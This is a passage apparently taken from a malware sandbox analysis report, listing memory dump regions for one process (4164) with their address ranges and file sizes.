                                          Filesize

                                          10.8MB

                                        • memory/4164-166-0x00007FFE13623000-0x00007FFE13625000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/4164-106-0x0000021E746A0000-0x0000021E746C2000-memory.dmp

                                          Filesize

                                          136KB

                                        • memory/4164-105-0x00007FFE13623000-0x00007FFE13625000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/4164-182-0x00007FFE13620000-0x00007FFE140E1000-memory.dmp

                                          Filesize

                                          10.8MB